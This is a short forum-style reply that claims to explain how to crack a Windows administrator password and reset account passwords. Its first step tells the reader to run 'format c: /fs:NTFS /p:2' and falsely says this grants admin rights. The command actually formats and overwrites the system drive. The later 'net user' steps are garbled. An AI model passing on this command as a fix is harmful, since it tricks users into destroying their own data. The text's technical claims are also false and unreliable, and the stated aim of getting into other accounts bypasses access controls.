Not sure if troll but whatever heres how to do it
In elevated cmd prompt type:
format c: /fs:NTFS /p:2
It will take second, it formats the cmd script to get administrator privledges
It will take a second to crack the admin password
On the next prompt type:
net user
Then you will see all accounts. Type
net user "user acct name"
Hit enter then you can change the password to whatever.
